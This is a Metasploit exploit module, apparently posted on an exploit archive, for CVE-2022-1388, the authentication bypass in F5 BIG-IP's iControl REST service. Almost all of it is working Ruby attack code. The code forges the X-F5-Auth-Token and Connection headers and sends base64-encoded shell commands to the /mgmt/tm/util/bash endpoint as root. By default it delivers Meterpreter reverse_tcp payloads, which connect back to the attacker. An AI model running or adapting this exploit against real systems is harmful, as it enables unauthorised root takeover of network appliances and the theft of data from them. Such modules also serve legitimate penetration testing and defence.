F5 BIG-IP iControl Remote Code Execution

This Metasploit module exploits an authentication bypass vulnerability in the F5 BIG-IP iControl REST service to gain access to the admin account, which is capable of executing commands through the /mgmt/tm/util/bash endpoint. Successful exploitation results in remote code execution as the root user.


SHA-256 | bb3a5bef34f53053f0da7eec9cad038bc4f47a0997b2e9cd601a17a1f034a0ad

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'F5 BIG-IP iControl RCE via REST Authentication Bypass',
'Description' => %q{
This module exploits an authentication bypass vulnerability
in the F5 BIG-IP iControl REST service to gain access to the
admin account, which is capable of executing commands
through the /mgmt/tm/util/bash endpoint.

Successful exploitation results in remote code execution
as the root user.
},
'Author' => [
'Heyder Andrade', # Metasploit module
'alt3kx <alt3kx[at]protonmail.com>', # PoC
'James Horseman', # Technical Writeup
'Ron Bowes' # Documentation of exploitation specifics
],
'References' => [
['CVE', '2022-1388'],
['URL', 'https://support.f5.com/csp/article/K23605346'],
['URL', 'https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/'], # Writeup
['URL', 'https://github.com/alt3kx/CVE-2022-1388_PoC'] # PoC
],
'License' => MSF_LICENSE,
'DisclosureDate' => '2022-05-04', # Vendor advisory
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Privileged' => true,
'Targets' => [
[
'Unix Command',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_cmd,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'
}
}
],
[
'Linux Dropper',
{
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :linux_dropper,
'DefaultOptions' => {
'CMDSTAGER::FLAVOR' => :bourne,
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
}
}
]
],
'DefaultTarget' => 1, # Linux Dropper avoids some timeout issues that Unix Command payloads sometimes encounter.
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true,
'PrependFork' => true, # Needed to avoid warnings about timeouts and potential failures across attempts.
'MeterpreterTryToFork' => true # Needed to avoid warnings about timeouts and potential failures across attempts.
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION], # Only one concurrent session
'SideEffects' => [
IOC_IN_LOGS, # /var/log/restjavad.0.log (rotated)
ARTIFACTS_ON_DISK # CmdStager
]
}
)
)

register_options(
[
OptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/']),
OptString.new('HttpUsername', [true, 'iControl username', 'admin']),
OptString.new('HttpPassword', [true, 'iControl password', ''])
]
)
register_advanced_options([
OptFloat.new('CmdExecTimeout', [true, 'Command execution timeout', 3.5])
])
end

def check
print_status("Checking #{datastore['RHOST']}:#{datastore['RPORT']}")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/mgmt/shared/authn/login'),
'method' => 'GET'
})

return CheckCode::Unknown unless res&.code == 401

body = res.get_json_document

return CheckCode::Safe unless body.key?('message') && body['kind'] == ':resterrorresponse'

signature = Rex::Text.rand_text_alpha(13)
stub = "echo #{signature}"
res = send_command(stub)
return CheckCode::Safe unless res&.code == 200

body = res.get_json_document

return CheckCode::Safe unless body['kind'] == 'tm:util:bash:runstate'

return CheckCode::Vulnerable if body['commandResult'].chomp == signature

CheckCode::Safe
end

def exploit
print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")

case target['Type']
when :unix_cmd
execute_command(payload.encoded)
when :linux_dropper
execute_cmdstager
end
end

def execute_command(cmd, _opts = {})
vprint_status("Executing command: #{cmd}")

res = send_command(cmd)
unless res
print_warning('Command execution timed out')
return
end

json = res.get_json_document

unless res.code == 200 && json['kind'] == 'tm:util:bash:runstate'
fail_with(Failure::PayloadFailed, 'Failed to execute command')
end

print_good('Successfully executed command')

return unless (cmd_result = json['commandResult'])

vprint_line(cmd_result)
end

def send_command(cmd)
bash_cmd = "eval $(echo #{Rex::Text.encode_base64(cmd)} | base64 -d)"
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/mgmt/tm/util/bash'),
'ctype' => 'application/json',
'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),
'headers' => {
'Host' => 'localhost',
'Connection' => 'keep-alive, X-F5-Auth-Token',
'X-F5-Auth-Token' => Rex::Text.rand_text_alpha_lower(6)
},
'data' => {
'command' => 'run',
'utilCmdArgs' => "-c '#{bash_cmd}'"
}.to_json
}, datastore['CmdExecTimeout'])
end
end

Related Posts